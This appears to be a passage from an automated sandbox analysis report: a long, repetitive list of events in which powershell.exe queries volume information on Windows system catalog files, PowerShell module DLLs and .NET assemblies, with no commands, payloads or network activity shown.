                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
